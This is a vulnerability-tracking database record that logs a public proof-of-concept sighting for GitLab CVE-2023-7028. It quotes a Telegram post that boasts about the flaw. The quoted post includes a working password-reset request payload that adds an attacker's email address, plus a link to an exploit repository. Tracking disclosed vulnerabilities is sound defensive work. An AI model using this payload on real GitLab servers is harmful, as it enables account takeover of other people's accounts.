{"uuid": "a1bd34e5-63b0-4aa2-9e7c-bbc6425b6182", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-7028", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/307", "content": "\ud83d\udea8Alert\ud83d\udea8 CVE-2023-7028&5356 GitLab Addresses Account Takeover & Command Flaws \n\nAccount Takeover via Password Reset without user interactions\n\nA critical vulnerability in GitLab CE/EE (CVE-2023-7028) can be easily exploited by attackers to reset GitLab user account passwords.\n\nuser[email][]=valid@email.com&user[email][]=attacker@email.com \n\n-PWNED \ud83d\ude0e\n\nhttps://github.com/Vozec/CVE-2023-7028\n\nExploit Guys \ud83d\ude02", "creation_timestamp": "2024-01-14T08:35:24.000000Z"}